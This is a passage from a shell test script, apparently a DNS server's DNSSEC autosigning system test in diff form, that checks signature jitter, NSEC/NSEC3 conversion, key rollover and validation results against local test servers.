_expiretimes=$(freq "$_file" | awk '{print $1}') + + _count=0 + # Check if we have at least 4 days + # This number has been tuned for `sig-validity-interval 10 2`, as + # 1 signature expiration dates should be spread out across at most 8 (10-2) days + # 2. we remove first and last day to remove frequency outlier, we are left with 6 (8-2) days + # 3. we subtract two more days to allow test pass on day boundaries, etc. leaving us with 4 (6-2) + for _num in $_expiretimes + do + _count=$((_count+1)) + done + if [ "$_count" -lt 4 ]; then + echo_i "error: not enough categories" + return 1 + fi + + # Calculate mean + _total=0 + for _num in $_expiretimes + do + _total=$((_total+_num)) + done + _mean=$(($_total / $_count)) + + # Calculate stddev + _stddev=0 + for _num in $_expiretimes + do + _stddev=$(echo "$_stddev + (($_num - $_mean) * ($_num - $_mean))" | bc) + done + _stddev=$(echo "sqrt($_stddev/$_count)" | bc) + + # We expect the number of signatures not to exceed the mean +- 3 * stddev. + _limit=$((_stddev*3)) + _low=$((_mean-_limit)) + _high=$((_mean+_limit)) + # Find outliers. + echo_i "checking whether all frequencies fall into <$_low;$_high> range" + for _num in $_expiretimes + do + if [ $_num -gt $_high ]; then + echo_i "error: too many RRSIG records ($_num) in expiration bucket" + _ret=1 + fi + if [ $_num -lt $_low ]; then + echo_i "error: too few RRSIG records ($_num) in expiration bucket" + _ret=1 + fi + done + + return $_ret +} + +# +# The NSEC record at the apex of the zone and its RRSIG records are +# added as part of the last step in signing a zone. We wait for the +# NSEC records to appear before proceeding with a counter to prevent +# infinite loops if there is a error. +# +echo_i "waiting for autosign changes to take effect" +i=0 +while [ $i -lt 30 ] +do + ret=0 + # + # Wait for the root DNSKEY RRset to be fully signed. + # + $DIG $DIGOPTS . @10.53.0.1 dnskey > dig.out.ns1.test$n || ret=1 + grep "ANSWER: 10," dig.out.ns1.test$n > /dev/null || ret=1 + for z in . + do + $DIG $DIGOPTS $z @10.53.0.1 nsec > dig.out.ns1.test$n || ret=1 + grep "NS SOA" dig.out.ns1.test$n > /dev/null || ret=1 + done + for z in bar. example. private.secure.example. optout-with-ent. + do + $DIG $DIGOPTS $z @10.53.0.2 nsec > dig.out.ns2.test$n || ret=1 + grep "NS SOA" dig.out.ns2.test$n > /dev/null || ret=1 + done + for z in bar. example. inacksk2.example. inacksk3.example \ + inaczsk2.example. inaczsk3.example noksk.example nozsk.example + do + $DIG $DIGOPTS $z @10.53.0.3 nsec > dig.out.ns3.test$n || ret=1 + grep "NS SOA" dig.out.ns3.test$n > /dev/null || ret=1 + done + i=$((i + 1)) + if [ $ret = 0 ]; then break; fi + echo_i "waiting ... ($i)" + sleep 2 +done +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "done"; fi +status=$((status + ret)) + +echo_i "Convert optout-with-ent from nsec to nsec3" +($RNDCCMD 10.53.0.2 signing -nsec3param 1 1 1 - optout-with-ent 2>&1 | sed 's/^/ns2 /' | cat_i) || ret=1 + +echo_i "Initial counts of RRSIG expiry fields values for auto signed zones" +for z in . +do + echo_i zone $z + $DIG $DIGOPTS $z @10.53.0.1 axfr | awk '$4 == "RRSIG" {print $9}' | sort | uniq -c | cat_i +done +for z in bar. example. private.secure.example. +do + echo_i zone $z + $DIG $DIGOPTS $z @10.53.0.2 axfr | awk '$4 == "RRSIG" {print $9}' | sort | uniq -c | cat_i +done +for z in inacksk2.example. inacksk3.example inaczsk2.example. inaczsk3.example +do + echo_i zone $z + $DIG $DIGOPTS $z @10.53.0.3 axfr | awk '$4 == "RRSIG" {print $9}' | sort | uniq -c | cat_i +done + +# Set logfile offset for wait_for_log usage. +nextpartreset ns3/named.run + +# +# Check that DNSKEY is initially signed with a KSK and not a ZSK. +# +echo_i "check that zone with active and inactive KSK and active ZSK is properly" +echo_ic "resigned after the active KSK is deleted - stage 1: Verify that DNSKEY" +echo_ic "is initially signed with a KSK and not a ZSK. ($n)" +ret=0 + +$DIG $DIGOPTS @10.53.0.3 axfr inacksk3.example > dig.out.ns3.test$n + +zskid=$(awk '$4 == "DNSKEY" && $5 == 256 { print }' dig.out.ns3.test$n | + $DSFROMKEY -A -2 -f - inacksk3.example | awk '{ print $4}') +grep "DNSKEY ${DEFAULT_ALGORITHM_NUMBER} 2 " dig.out.ns3.test$n > /dev/null || ret=1 + +pattern="DNSKEY ${DEFAULT_ALGORITHM_NUMBER} 2 [0-9]* [0-9]* [0-9]* ${zskid} " +grep "${pattern}" dig.out.ns3.test$n > /dev/null && ret=1 + +count=$(awk 'BEGIN { count = 0 } + $4 == "RRSIG" && $5 == "DNSKEY" { count++ } + END {print count}' dig.out.ns3.test$n) +test $count -eq 1 || ret=1 + +count=$(awk 'BEGIN { count = 0 } + $4 == "DNSKEY" { count++ } + END {print count}' dig.out.ns3.test$n) +test $count -eq 3 || ret=1 + +awk='$4 == "RRSIG" && $5 == "DNSKEY" { printf "%05u\n", $11 }' +id=$(awk "${awk}" dig.out.ns3.test$n) + +keyfile=$(printf "ns3/Kinacksk3.example.+%03u+%s" "${DEFAULT_ALGORITHM_NUMBER}" "${id}") +$SETTIME -D now+5 "${keyfile}" > settime.out.test$n || ret=1 +($RNDCCMD 10.53.0.3 loadkeys inacksk3.example 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1 + +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# +# Check that zone is initially signed with a ZSK and not a KSK. +# +echo_i "check that zone with active and inactive ZSK and active KSK is properly" +echo_ic "resigned after the active ZSK is deleted - stage 1: Verify that zone" +echo_ic "is initially signed with a ZSK and not a KSK. ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 axfr inaczsk3.example > dig.out.ns3.test$n +kskid=$(awk '$4 == "DNSKEY" && $5 == 257 { print }' dig.out.ns3.test$n | + $DSFROMKEY -2 -f - inaczsk3.example | awk '{ print $4}' ) +grep "CNAME ${DEFAULT_ALGORITHM_NUMBER} 3 " dig.out.ns3.test$n > /dev/null || ret=1 +grep "CNAME ${DEFAULT_ALGORITHM_NUMBER} 3 [0-9]* [0-9]* [0-9]* ${kskid} " dig.out.ns3.test$n > /dev/null && ret=1 +count=$(awk 'BEGIN { count = 0 } + $4 == "RRSIG" && $5 == "CNAME" { count++ } + END {print count}' dig.out.ns3.test$n) +test $count -eq 1 || ret=1 +count=$(awk 'BEGIN { count = 0 } + $4 == "DNSKEY" { count++ } + END {print count}' dig.out.ns3.test$n) +test $count -eq 3 || ret=1 +id=$(awk '$4 == "RRSIG" && $5 == "CNAME" { printf "%05u\n", $11 }' dig.out.ns3.test$n) + +keyfile=$(printf "ns3/Kinaczsk3.example.+%03u+%s" "${DEFAULT_ALGORITHM_NUMBER}" "${id}") +$SETTIME -D now+5 "${keyfile}" > settime.out.test$n || ret=1 +($RNDCCMD 10.53.0.3 loadkeys inaczsk3.example 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking NSEC->NSEC3 conversion prerequisites ($n)" +ret=0 +# these commands should result in an empty file: +$DIG $DIGOPTS +noall +answer nsec3.example. nsec3param @10.53.0.3 > dig.out.ns3.1.test$n || ret=1 +grep "NSEC3PARAM" dig.out.ns3.1.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +noall +answer autonsec3.example. nsec3param @10.53.0.3 > dig.out.ns3.2.test$n || ret=1 +grep "NSEC3PARAM" dig.out.ns3.2.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking NSEC3->NSEC conversion prerequisites ($n)" +ret=0 +$DIG $DIGOPTS +noall +answer nsec3-to-nsec.example. nsec3param @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "NSEC3PARAM" dig.out.ns3.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "converting zones from nsec to nsec3" +$NSUPDATE > /dev/null 2>&1 <<END || status=1 +server 10.53.0.3 ${PORT} +zone nsec3.nsec3.example. +update add nsec3.nsec3.example. 3600 NSEC3PARAM 1 0 10 BEEF +send +zone optout.nsec3.example. +update add optout.nsec3.example. 3600 NSEC3PARAM 1 1 10 BEEF +send +zone nsec3.example. +update add nsec3.example. 3600 NSEC3PARAM 1 0 10 BEEF +send +zone autonsec3.example. +update add autonsec3.example. 3600 NSEC3PARAM 1 0 20 DEAF +send +zone nsec3.optout.example. +update add nsec3.optout.example. 3600 NSEC3PARAM 1 0 10 BEEF +send +zone optout.optout.example. +update add optout.optout.example. 3600 NSEC3PARAM 1 1 10 BEEF +send +zone optout.example. +update add optout.example. 3600 NSEC3PARAM 1 1 10 BEEF +send +END + +if $SHELL ../testcrypto.sh -q RSASHA1 +then + # try to convert nsec-only.example; this should fail due to + # non-NSEC3 compatible keys + echo_i "preset nsec3param in unsigned zone via nsupdate ($n)" + $NSUPDATE > nsupdate.out 2>&1 <<END +server 10.53.0.3 ${PORT} +zone nsec-only.example. +update add nsec-only.example. 3600 NSEC3PARAM 1 0 10 BEEF +send +END +fi + +echo_i "checking for nsec3param in unsigned zone ($n)" +ret=0 +$DIG $DIGOPTS +noall +answer autonsec3.example. nsec3param @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "NSEC3PARAM" dig.out.ns3.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking for nsec3param signing record ($n)" +ret=0 +$RNDCCMD 10.53.0.3 signing -list autonsec3.example. > signing.out.test$n 2>&1 +grep "Pending NSEC3 chain 1 0 20 DEAF" signing.out.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "resetting nsec3param via rndc signing ($n)" +ret=0 +$RNDCCMD 10.53.0.3 signing -clear all autonsec3.example. > /dev/null 2>&1 +$RNDCCMD 10.53.0.3 signing -nsec3param 1 1 10 beef autonsec3.example. > /dev/null 2>&1 +for i in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + $RNDCCMD 10.53.0.3 signing -list autonsec3.example. > signing.out.test$n 2>&1 + grep "Pending NSEC3 chain 1 1 10 BEEF" signing.out.test$n > /dev/null || ret=1 + num=$(grep "Pending " signing.out.test$n | wc -l) + [ $num -eq 1 ] || ret=1 + [ $ret -eq 0 ] && break + echo_i "waiting ... ($i)" + sleep 2 +done +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "signing preset nsec3 zone" +zsk=$(cat autozsk.key) +ksk=$(cat autoksk.key) +$SETTIME -K ns3 -P now -A now $zsk > settime.out.test$n.zsk || ret=1 +$SETTIME -K ns3 -P now -A now $ksk > settime.out.test$n.ksk || ret=1 +($RNDCCMD 10.53.0.3 loadkeys autonsec3.example. 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1 + +echo_i "waiting for changes to take effect" +sleep 3 + +echo_i "converting zone from nsec3 to nsec" +$NSUPDATE > /dev/null 2>&1 << END || status=1 +server 10.53.0.3 ${PORT} +zone nsec3-to-nsec.example. +update delete nsec3-to-nsec.example. NSEC3PARAM +send +END + +echo_i "waiting for change to take effect" +sleep 3 + +missing=$(keyfile_to_key_id "$(cat noksk-ksk.key)") +echo_i "checking that expired RRSIGs from missing KSK $missing are not deleted ($n)" +ret=0 +$JOURNALPRINT ns3/noksk.example.db.jnl | \ + awk '{if ($1 == "del" && $5 == "RRSIG" && $12 == id) {error=1}} END {exit error}' id=$missing || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +missing=$(keyfile_to_key_id "$(cat nozsk-zsk.key)") +ksk=$(keyfile_to_key_id "$(cat nozsk-ksk.key)") +echo_i "checking that expired RRSIGs from missing ZSK $missing are replaced ($n)" +ret=0 +$JOURNALPRINT ns3/nozsk.example.db.jnl | \ + awk '{if ($1 == "del" && $5 == "RRSIG" && $12 == id) {ok=1}} END {exit ok?0:1}' id=$missing || ret=1 +$JOURNALPRINT ns3/nozsk.example.db.jnl | \ + awk '{if ($1 == "add" && $5 == "RRSIG" && $12 == id) {ok=1}} END {exit ok?0:1}' id=$ksk || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +inactive=$(keyfile_to_key_id "$(cat inaczsk-zsk.key)") +ksk=$(keyfile_to_key_id "$(cat inaczsk-ksk.key)") +echo_i "checking that expired RRSIGs from inactive ZSK $inactive are replaced ($n)" +ret=0 +$JOURNALPRINT ns3/inaczsk.example.db.jnl | \ + awk '{if ($1 == "del" && $5 == "RRSIG" && $12 == id) {ok=1}} END {exit ok?0:1}' id=$inactive || ret=1 +$JOURNALPRINT ns3/inaczsk.example.db.jnl | \ + awk '{if ($1 == "add" && $5 == "RRSIG" && $12 == id) {ok=1}} END {exit ok?0:1}' id=$ksk || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that replaced RRSIGs are not logged (missing ZSK private key) ($n)" +ret=0 +loglines=$(grep "Key nozsk.example/$DEFAULT_ALGORITHM/$missing .* retaining signatures" ns3/named.run | wc -l) +[ "$loglines" -eq 0 ] || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that replaced RRSIGs are not logged (inactive ZSK private key) ($n)" +ret=0 +loglines=$(grep "Key inaczsk.example/$DEFAULT_ALGORITHM/$inactive .* retaining signatures" ns3/named.run | wc -l) +[ "$loglines" -eq 0 ] || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Send rndc sync command to ns1, ns2 and ns3, to force the dynamically +# signed zones to be dumped to their zone files +echo_i "dumping zone files" +($RNDCCMD 10.53.0.1 sync 2>&1 | sed 's/^/ns1 /' | cat_i) || ret=1 +($RNDCCMD 10.53.0.2 sync 2>&1 | sed 's/^/ns2 /' | cat_i) || ret=1 +($RNDCCMD 10.53.0.3 sync 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1 + +now="$(TZ=UTC date +%Y%m%d%H%M%S)" +check_expiry() ( + $DIG $DIGOPTS AXFR oldsigs.example @10.53.0.3 > dig.out.test$n + nearest_expiration="$(awk '$4 == "RRSIG" { print $9 }' < dig.out.test$n | sort -n | head -1)" + if [ "$nearest_expiration" -le "$now" ]; then + echo_i "failed: $nearest_expiration <= $now" + return 1 + fi +) + +echo_i "checking expired signatures were updated ($n)" +retry 10 check_expiry || ret=1 +$DIG $DIGOPTS +noauth a.oldsigs.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.oldsigs.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Check jitter distribution. +echo_i "checking expired signatures were jittered correctly ($n)" +ret=0 +$DIG $DIGOPTS axfr oldsigs.example @10.53.0.3 > dig.out.ns3.test$n || ret=1 +checkjitter dig.out.ns3.test$n || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking NSEC->NSEC3 conversion succeeded ($n)" +ret=0 +$DIG $DIGOPTS nsec3.example. nsec3param @10.53.0.3 > dig.out.ns3.ok.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.ok.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +noauth q.nsec3.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth q.nsec3.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking direct NSEC3 autosigning succeeded ($n)" +ret=0 +$DIG $DIGOPTS +noall +answer autonsec3.example. nsec3param @10.53.0.3 > dig.out.ns3.ok.test$n || ret=1 +[ -s dig.out.ns3.ok.test$n ] || ret=1 +grep "NSEC3PARAM" dig.out.ns3.ok.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +noauth q.autonsec3.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth q.autonsec3.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking NSEC->NSEC3 conversion failed with NSEC-only key ($n)" +ret=0 +if $SHELL ../testcrypto.sh -q RSASHA1 +then + grep "failed: REFUSED" nsupdate.out > /dev/null || ret=1 +else + echo_i "skip: RSASHA1 not supported" +fi +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking NSEC3->NSEC conversion succeeded ($n)" +ret=0 +# this command should result in an empty file: +$DIG $DIGOPTS +noall +answer nsec3-to-nsec.example. nsec3param @10.53.0.3 > dig.out.ns3.nx.test$n || ret=1 +grep "NSEC3PARAM" dig.out.ns3.nx.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +noauth q.nsec3-to-nsec.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth q.nsec3-to-nsec.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking NSEC3->NSEC conversion with 'rndc signing -nsec3param none' ($n)" +ret=0 +$RNDCCMD 10.53.0.3 signing -nsec3param none autonsec3.example. > /dev/null 2>&1 +# this command should result in an empty file: +no_nsec3param() ( + $DIG $DIGOPTS +noall +answer autonsec3.example. nsec3param @10.53.0.3 > dig.out.ns3.nx.test$n || return 1 + grep "NSEC3PARAM" dig.out.ns3.nx.test$n > /dev/null && return 1 + return 0 +) +retry_quiet 10 no_nsec3param || ret=1 +$DIG $DIGOPTS +noauth q.autonsec3.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth q.autonsec3.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking TTLs of imported DNSKEYs (no default) ($n)" +ret=0 +$DIG $DIGOPTS +tcp +noall +answer dnskey ttl1.example. @10.53.0.3 > dig.out.ns3.test$n || ret=1 +[ -s dig.out.ns3.test$n ] || ret=1 +(awk 'BEGIN {r=0} $2 != 300 {r=1; print "found TTL " $2} END {exit r}' dig.out.ns3.test$n | cat_i) || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking TTLs of imported DNSKEYs (with default) ($n)" +ret=0 +$DIG $DIGOPTS +tcp +noall +answer dnskey ttl2.example. @10.53.0.3 > dig.out.ns3.test$n || ret=1 +[ -s dig.out.ns3.test$n ] || ret=1 +(awk 'BEGIN {r=0} $2 != 60 {r=1; print "found TTL " $2} END {exit r}' dig.out.ns3.test$n | cat_i) || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking TTLs of imported DNSKEYs (mismatched) ($n)" +ret=0 +$DIG $DIGOPTS +tcp +noall +answer dnskey ttl3.example. @10.53.0.3 > dig.out.ns3.test$n || ret=1 +[ -s dig.out.ns3.test$n ] || ret=1 +(awk 'BEGIN {r=0} $2 != 30 {r=1; print "found TTL " $2} END {exit r}' dig.out.ns3.test$n | cat_i) || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking TTLs of imported DNSKEYs (existing RRset) ($n)" +ret=0 +$DIG $DIGOPTS +tcp +noall +answer dnskey ttl4.example. @10.53.0.3 > dig.out.ns3.test$n || ret=1 +[ -s dig.out.ns3.test$n ] || ret=1 +(awk 'BEGIN {r=0} $2 != 30 {r=1; print "found TTL " $2} END {exit r}' dig.out.ns3.test$n | cat_i) || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking positive validation NSEC ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +$DIG $DIGOPTS +noauth a.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking positive validation NSEC3 ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking positive validation OPTOUT ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking negative validation NXDOMAIN NSEC ($n)" +ret=0 +$DIG $DIGOPTS +noauth q.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +$DIG $DIGOPTS +noauth q.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking negative validation NXDOMAIN NSEC3 ($n)" +ret=0 +$DIG $DIGOPTS +noauth q.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth q.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking negative validation NXDOMAIN OPTOUT ($n)" +ret=0 +$DIG $DIGOPTS +noauth q.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth q.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking negative validation NODATA NSEC ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +$DIG $DIGOPTS +noauth a.example. @10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking negative validation NODATA NSEC3 ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.nsec3.example. \ + @10.53.0.3 txt > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.nsec3.example. \ + @10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking negative validation NODATA OPTOUT ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.optout.example. \ + @10.53.0.3 txt > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.optout.example. \ + @10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Check the insecure.example domain + +echo_i "checking 1-server insecurity proof NSEC ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.insecure.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.insecure.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking 1-server negative insecurity proof NSEC ($n)" +ret=0 +$DIG $DIGOPTS q.insecure.example. a @10.53.0.3 \ + > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS q.insecure.example. a @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Check the secure.example domain + +echo_i "checking multi-stage positive validation NSEC/NSEC ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.secure.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.secure.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking multi-stage positive validation NSEC/NSEC3 ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking multi-stage positive validation NSEC/OPTOUT ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n 